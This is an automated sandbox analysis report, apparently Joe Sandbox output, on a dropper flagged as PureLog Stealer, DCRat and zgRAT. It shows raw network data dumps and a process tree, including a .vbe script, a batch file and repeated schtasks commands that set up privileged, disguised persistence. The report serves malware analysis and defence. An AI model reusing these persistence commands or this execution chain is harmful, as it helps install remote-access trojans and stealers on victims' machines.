                                                                                                                      2024-12-08 14:27:00 UTC1369INData Raw: 34 ed f4 73 b9 1f 47 56 19 87 e2 bd 7a 7a 20 6f a0 d4 ad 1d f4 20 cf 18 98 aa 69 d0 2f 08 61 ed 95 cb 96 c1 13 40 db ec e9 22 ba 42 74 69 3f 1b 0d 07 41 af 64 94 2b 63 39 8c 78 ba 78 ec d7 49 04 f2 3a 75 33 36 56 f9 73 bc cb c8 33 7f ea 28 2e e7 01 8d 1c c4 85 21 06 f1 8f 58 b7 8c d8 8b c8 1d e1 62 eb 1c da 5a a2 22 65 61 71 d4 7d b1 dd d3 45 75 31 15 ce 3e 2d ca b8 5d 14 96 01 12 01 8b cb a5 29 9d 35 f6 b1 9d 5d aa 6a 11 17 08 cc 46 c6 92 8a c3 d2 2d 31 5d eb e4 25 7a e3 49 b9 e6 98 2c dc 6c c5 2c fd c2 58 19 d4 62 4c a2 90 56 a4 17 4e cf 8c e7 f6 3f 92 bd af 5d 27 f3 72 4f f1 2a 84 f5 87 15 1b a3 23 3f 03 27 9e 8d 89 22 0c 68 a4 8c 71 37 46 02 a0 2a 55 6f 7b da 98 14 e4 d5 01 19 01 c0 1f 11 96 d3 3a ab 79 06 41 30 82 50 07 de f7 8d dd a4 b5 8a 47 e0 c1
                                                                                                                      Data Ascii: 4sGVzz o i/a@"Bti?Ad+c9xxI:u36Vs3(.!XbZ"eaq}Eu1>-])5]jF-1]%zI,l,XbLVN?]'rO*#?'"hq7F*Uo{:yA0PG
                                                                                                                      2024-12-08 14:27:00 UTC1369INData Raw: 22 d7 d3 9e 49 dd 71 ef 29 6c 33 e6 3b 18 c6 28 58 52 4b b6 49 16 8c 52 60 de e1 c5 02 49 a7 b8 bf 19 ad 06 3f 13 d5 c6 96 e2 61 fc ee bd 6e 42 46 c2 50 16 e5 b1 de 39 33 64 f1 9f 05 e1 9a f2 79 fc b9 80 3c e7 5f 33 5c 43 f8 c8 19 49 38 5f 1f 97 1f 0b ad 34 36 4d e8 0c 2c 57 5a f2 69 68 eb 4c 45 a3 50 b9 00 9f d7 34 cf 5c e8 68 57 19 98 ea f8 aa 9b 76 c1 80 5a 07 5e fd 07 e6 f8 58 ea d9 e2 ae 67 c2 f0 ee 55 08 21 fa eb bc c7 2b 50 d8 77 8c ee 45 5f 44 1e 03 5a cf f8 cc 31 22 34 fe be d9 81 cc 47 74 47 97 b5 c9 c6 74 bc 16 bd ac a2 7c a7 42 fd 82 e8 67 1e d6 59 bc ed 40 04 3b 28 02 c0 3f 4d e4 8b 95 ad 35 6b 50 ad 23 2a 9e d2 e9 2e dd 5b 9d 0c e8 c6 8a 02 59 a2 f5 8d 23 20 f6 63 e9 9a a4 64 1b 78 a2 9c 3b 36 4f 81 00 15 40 c2 77 67 2d 7b 11 89 da aa e9 00
                                                                                                                      Data Ascii: "Iq)l3;(XRKIR`I?anBFP93dy<_3\CI8_46M,WZihLEP4\hWvZ^XgU!+PwE_DZ1"4GtGt|BgY@;(?M5kP#*.[Y# cdx;6O@wg-{
                                                                                                                      2024-12-08 14:27:00 UTC1369INData Raw: d8 13 a3 8c 59 27 23 8b 4c 42 5d 86 cc 5d 8d 7e b6 4a 3b 4d 2f 6b cd 8e 39 17 84 2d c4 9d 2d 06 dc 41 b0 55 1d 78 a1 4f 67 73 a3 d2 19 9e 2a 0f 2b 2f 57 f7 d6 f5 fc 2b 83 e1 07 4c 76 6f 0a b6 80 13 9b 0c d2 8d 81 84 9c 8b 26 6c 24 56 57 ca 83 ec ef d2 26 78 97 71 70 d3 10 74 30 79 64 5b cd d9 5d 34 2a a1 c4 64 91 ab 2a df 38 5b 74 04 47 1c 6c 1f bf 13 97 3d e7 6c c8 40 11 ba 41 80 83 92 f8 ad 37 eb 3f b7 55 24 46 5b fa 7e b6 26 6a 13 53 94 fd 57 d1 f5 8d 3c 6a e2 dd c1 02 12 cb ae bd 30 20 25 4f ef e0 8e cc 43 fc 67 73 10 dc 33 93 c7 3f 6d e5 4d 2c 39 98 72 d0 ea e9 cf fa 53 02 74 58 e6 b7 cf 7b b7 a3 25 f1 4a 4f f2 d8 44 97 cb 6f 7a 08 d5 4b 44 e3 6b 9c 5f 0d d3 dc a9 2b 4e b9 23 41 a3 b7 23 7e e4 83 56 84 0e 80 8c 3b e1 44 aa ec 24 96 ea 10 1b ae 64 69
                                                                                                                      Data Ascii: Y'#LB]]~J;M/k9--AUxOgs*+/W+Lvo&l$VW&xqpt0yd[]4*d*8[tGl=l@A7?U$F[~&jSW<j0 %OCgs3?mM,9rStX{%JODozKDk_+N#A#~V;D$di
                                                                                                                      2024-12-08 14:27:00 UTC1369INData Raw: da 99 ea 92 e9 00 ef 5e 1d cc e3 4c dd 99 0a ea 22 95 79 a8 15 e7 34 da 80 6e 08 dd a8 8c 85 32 d5 88 a0 9f e8 90 cc 8d 9b b4 56 94 65 51 e4 ec 40 1d dc a8 ab 82 35 95 15 2f c3 98 b4 19 94 92 d5 3c b9 0d cc 50 0a 00 3b 36 03 db 95 e5 00 dc 48 60 ae fa 9a 4a 75 bb 85 e2 61 b2 3c 52 f0 23 21 1e 85 b7 f8 d9 f3 99 cf 5b 5b a4 b0 fb d2 48 86 e8 03 c2 21 91 be 2b bf 23 60 8f c3 1f df 5f 4f 25 c2 05 68 0c 06 91 6e 2d 9d 17 37 51 e8 67 f8 b4 0c 85 d6 88 4e a0 bd 23 8d b2 b1 e2 d3 91 88 11 57 de 45 a2 dd a9 e5 65 2e 0c 33 ee 44 17 c1 55 fe 95 bb c8 7c 65 5f 89 08 4a ec 84 b2 31 54 6e 36 69 24 b7 84 39 56 8f 9c a6 07 d2 7c 0f 7b fa 0b 8e 0a 89 50 0c ea 4e 64 4c 8b ac 48 1f 55 99 6e 41 e1 0e 20 d3 59 1e 04 fc 1e c4 35 9f 2c c0 4a df 0d 0f c2 81 c8 b4 54 85 70 f0 d1
                                                                                                                      Data Ascii: ^L"y4n2VeQ@5/<P;6H`Jua<R#![[H!+#`_O%hn-7QgN#WEe.3DU|e_J1Tn6i$9V|{PNdLHUnA Y5,JTp
                                                                                                                      2024-12-08 14:27:00 UTC1369INData Raw: fb c1 92 d9 49 d2 06 4d ae 56 37 58 21 a3 78 7c 23 ee 29 ec d4 f3 ee e2 36 ab f5 f4 7e c7 68 e3 28 07 87 c2 fd 2b 33 31 06 b3 a3 4b 07 80 50 13 b7 7d 8e d3 87 4d 5a a7 e6 69 8b c9 9e 11 4b bc 25 cf ba 81 c1 db c4 99 3d 01 b3 1a 01 aa 3a fb f5 1f 8f ac 6c 75 e1 4c f0 26 8a 80 f7 0c c7 91 85 55 3e 52 c2 79 e8 e7 62 42 d3 64 22 a1 08 bb 54 a4 9f 72 49 36 94 31 f5 57 5e 00 fe d2 f4 36 2b 52 58 21 35 68 fe a5 6a c6 2f 9a b1 53 75 89 e0 c2 7b 61 b6 f7 03 98 3e 33 9b e1 8a e7 24 e4 19 56 b8 db c7 33 fb 48 5a 85 99 bd c8 75 5b 92 bb 69 7c 9e e0 e3 f7 8a d7 1a 23 6c f5 5f 58 0c bf 5f 15 78 f1 32 cd f8 b4 2a fe 7c 46 d8 c7 28 bc 93 c1 06 14 80 81 e0 b6 cd 73 75 aa 5c 92 a2 7e 54 7d d8 23 66 b8 49 e7 e2 21 a1 b0 53 43 93 be a8 2b 89 7d d9 c9 da 7f 99 22 32 ed 22 6f
                                                                                                                      Data Ascii: IMV7X!x|#)6~h(+31KP}MZiK%=:luL&U>RybBd"TrI61W^6+RX!5hj/Su{a>3$V3HZu[i|#l_X_x2*|F(su\~T}#fI!SC+}"2"o


                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      High Level Behavior Distribution

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:09:26:53
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\gorkmTnChA.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\gorkmTnChA.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:9'843'712 bytes
                                                                                                                      MD5 hash:E4E1923F51EB61ED20CBBFAB84AB25B5
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1654559691.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1648785828.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:1
                                                                                                                      Start time:09:26:53
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
                                                                                                                      Imagebase:0x490000
                                                                                                                      File size:3'860'292 bytes
                                                                                                                      MD5 hash:A7645CAC446E39F9961F51E3BB1C0515
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1656268229.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1655715436.000000000688F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 63%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:2
                                                                                                                      Start time:09:26:54
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\bridgeMonitorDhcpCommon\osBsCLbPfQftwHCHlhElxAOzJXM9OXwC38dZCkih.vbe"
                                                                                                                      Imagebase:0x1c0000
                                                                                                                      File size:147'456 bytes
                                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:3
                                                                                                                      Start time:09:26:54
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe"
                                                                                                                      Imagebase:0x840000
                                                                                                                      File size:5'973'672 bytes
                                                                                                                      MD5 hash:8A0591A6B534E32FA179F2D781B79026
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 50%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:4
                                                                                                                      Start time:09:27:01
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                      Imagebase:0x7ff747e50000
                                                                                                                      File size:69'632 bytes
                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:5
                                                                                                                      Start time:09:27:01
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 26CF464DBA35F416758053A43B23FD3D C
                                                                                                                      Imagebase:0x310000
                                                                                                                      File size:59'904 bytes
                                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:7
                                                                                                                      Start time:09:27:02
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Local\Temp\{F123046A-2CBF-4743-A59B-E3D2751B5780}\51B5780\SandeLLoCHECKER_Installer.msi AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733667848 " AI_FOUND_PREREQS=".NET Framework 4.8 (web installer)"
                                                                                                                      Imagebase:0x310000
                                                                                                                      File size:59'904 bytes
                                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:8
                                                                                                                      Start time:09:27:03
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 7BC9C83AA604E4F7E55BC37E42BF8976 C
                                                                                                                      Imagebase:0x310000
                                                                                                                      File size:59'904 bytes
                                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:9
                                                                                                                      Start time:09:27:05
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\bridgeMonitorDhcpCommon\KQ5XnVOYWwQFrPTZ9PsIrToBZTIRzi3E3YTHck8Ca7MF45bBlpw.bat" "
                                                                                                                      Imagebase:0x240000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:10
                                                                                                                      Start time:09:27:05
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:11
                                                                                                                      Start time:09:27:05
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\bridgeMonitorDhcpCommon/webDriverintoDll.exe"
                                                                                                                      Imagebase:0x4e0000
                                                                                                                      File size:3'538'432 bytes
                                                                                                                      MD5 hash:26C2B88440A62B4CB79201E01A404BD2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000000.1775306001.00000000004E2000.00000002.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.1853703523.0000000012EE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 63%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:14
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:15
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:16
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:17
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:18
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:19
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:20
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:21
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:22
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:23
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 8 /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:24
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:25
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 10 /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:26
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:27
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:28
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
